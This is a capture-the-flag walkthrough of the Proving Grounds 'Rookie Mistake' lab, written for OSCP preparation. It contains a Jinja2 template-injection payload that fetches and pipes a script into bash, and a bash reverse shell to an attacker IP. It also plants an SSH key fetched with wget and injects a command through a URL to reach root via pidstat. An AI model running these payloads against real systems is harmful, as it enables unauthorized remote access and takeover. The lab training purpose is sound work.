Proving grounds:Rookie Mistake

Today we will take a look at Proving grounds: Rookie Mistake. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.

• Network scan

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_ 256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
8080/tcp open http-proxy Werkzeug/2.1.2 Python/3.8.10
|_http-server-header: Werkzeug/2.1.2 Python/3.8.10

• Web(8080)

As the site says, there is a loophole regarding the token.

─# gobuster dir -u http://192.168.64.221:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.64.221:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,txt
[+] Timeout: 10s
===============================================================
2022/12/09 14:22:24 Starting gobuster in directory enumeration mode
===============================================================
/login (Status: 308) [Size: 253] [ → http://192.168.64.221:8080/login/]
/signup (Status: 308) [Size: 255] [ → http://192.168.64.221:8080/signup/]
/edit (Status: 308) [Size: 251] [ → http://192.168.64.221:8080/edit/]

Create an account.

Login to your account

View the token and enter it in jwt.io.

JWT.IO

To find the Secretkey

• SSTİ

Jinja2 SSTI

Prepare the payload to get the reverse shell.

└─# cat exploit.sh
bash -c ‘bash -i >& /dev/tcp/192.168.49.64/4444 0>&1’

Open 80 servers for the target server to see

└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) …

Let's run our code.

{{ config.__class__.from_envvar.__globals__.__builtins__.__import__(‘os’).popen(‘curl 192.168.49.64/exploit.sh | bash’).read() }}

If you remember the ssh port was open, let's use that and try to login with ssh

cp /root/.ssh/id_rsa.pub authorized_keys

Let's create a .ssh folder and copy authorized_keys from our server
mkdir /home/mike/.ssh
cd/home/mike/.ssh
wget IP/authorized_keys

Here we got the ssh login.

• root

Let’s look at the privileges

Looking at what’s on port 9123, we see that the pidstat command is running.

Check for Exploit

pidstat | GTFOBins

Now that we've found the exploit, let's run the payload as root and get a shell.
mike@MikeServer:~$ curl http://127.0.0.1:9123/pid/1%20-e%20bash%20exploit.sh

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”